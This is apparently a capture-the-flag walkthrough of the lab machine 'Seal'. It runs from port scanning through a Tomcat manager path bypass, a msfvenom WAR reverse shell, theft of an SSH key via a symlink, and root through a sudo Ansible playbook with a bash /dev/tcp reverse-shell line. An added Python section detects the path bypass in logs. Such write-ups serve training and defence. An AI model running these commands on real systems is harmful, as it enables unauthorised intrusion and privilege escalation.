```bash
nmap -p- --min-rate 10000 10.10.10.250 -Pn
```

After detecting the open ports (22, 443, 8080), we can run a more detailed nmap scan.

```bash
nmap -A -sC -sV -p22,443,8080 10.10.10.250
```

While I browse the application, it redirects to 'seal.htb', so I add this to the '/etc/hosts' file.

Let's access the application on port 8080, which is GitBucket.

I create an account and enumerate, looking for sensitive credentials.

```
Dr4ks:Dr4ks
```

I can see the seal_market repository here.

I find sensitive credentials in the latest commits.

```
tomcat:42MrHBf*z8{Z%
```

When I try to access the Tomcat manager by browsing to /manager/html, nginx blocks the request; to bypass this, I add a ; (semicolon) to the path.

After the bypass and successful authentication, I see the Tomcat manager section. URL => /manager;/html

To get a reverse shell, I need to upload a malicious .war file; let's create it with the msfvenom command.

```bash
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o dr4ks.war
```

Uploading gives a lot of errors; we need to handle the upload URL as below. The URL should be /manager/.;/html.

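As a defender's check on the nginx/Tomcat path mismatch used above (the ; and /.;/ tricks), here is an added Python example that is not part of the original writeup: it normalizes request paths roughly the way Tomcat does and flags access-log entries whose literal path slipped past a /manager/html prefix rule but still reached the manager. The RESTRICTED_PREFIX rule, the simplified normalizer and the log lines are constructed assumptions for this example.

```python
import re
from urllib.parse import unquote

# Literal prefix the proxy is meant to protect (the Tomcat manager path from the
# writeup); an nginx 'location /manager/html' rule matches only this exact text.
RESTRICTED_PREFIX = "/manager/html"
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/')

def tomcat_normalize(raw_path: str) -> str:
    """Approximate the path Tomcat routes on: drop the query string,
    percent-decode, strip ';param' path parameters from every segment and
    collapse empty, '.' and '..' segments (simplified model, not Tomcat code)."""
    path = unquote(raw_path.split("?", 1)[0])
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # 'manager;' -> 'manager', '.;' -> '.'
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)

def is_smuggled_restricted(raw_path: str) -> bool:
    """True when the literal path misses the proxy's prefix rule but the
    backend-normalized path lands inside it, i.e. the rule was bypassed."""
    literal_hit = raw_path.startswith(RESTRICTED_PREFIX)
    backend_hit = tomcat_normalize(raw_path).startswith(RESTRICTED_PREFIX)
    return backend_hit and not literal_hit

def flag_bypasses(log_lines):
    """Return raw request paths from nginx access-log lines that reach the
    restricted area only after backend normalization."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_smuggled_restricted(m.group(1)):
            flagged.append(m.group(1))
    return flagged

# Constructed sample access-log lines for this example (not from the box).
SAMPLE_LOG = [
    '10.10.16.6 - - [01/Jan/2024:10:00:00 +0000] "GET /manager/html HTTP/1.1" 403 153',
    '10.10.16.6 - - [01/Jan/2024:10:00:05 +0000] "GET /manager;/html HTTP/1.1" 200 2048',
    '10.10.16.6 - - [01/Jan/2024:10:00:09 +0000] "POST /manager/.;/html/upload HTTP/1.1" 200 1234',
    '10.10.16.6 - - [01/Jan/2024:10:01:00 +0000] "GET /admin/dashboard/ HTTP/1.1" 200 512',
]
```

Calling flag_bypasses(SAMPLE_LOG) returns the two manager requests that nginx let through; the durable fix is to enforce the access rule in Tomcat itself (or on the normalized path) rather than on the literal text the proxy sees.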
When I click my dr4ks endpoint, I got a reverse shell on port 1337.

Let's make the shell interactive.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
```

During enumeration, I found two zipped backup files in '/opt/backups/archives'.

Let's get one of them.

1. First, start an HTTP server with Python.

```bash
python3 -m http.server --bind 10.10.10.250 3169
```

2. Then grab the files by visiting the URL.

These backup files are generated by Ansible, so they contain the same information as what is generated (they are the same stuff).

I also know there is one writable folder, ./uploads; let's create a link to luis's folder with the ln command.

```bash
ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
```

After this, the playbook runs and our link worked as well.

Let's grab this big file.

I extract all the data from it as below.

```bash
gunzip -d <backup>.gz
tar -xvf <extracted tar file>
```

Here is the private key (id_rsa) file; I change its permissions and connect to the machine.

```bash
chmod 600 id_rsa
ssh -i id_rsa luis@10.10.10.250
```

user.txt

When I run the sudo -l command for privilege escalation, it says running the playbook is a privileged action for the luis user.

I will exploit this by creating the following playbook .yaml file.

```yaml
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.16.6/2024 0>&1'
```

Then run this playbook file.

```bash
sudo ansible-playbook dr4ks.yml
```

I got a reverse shell on port 2024.

root.txt
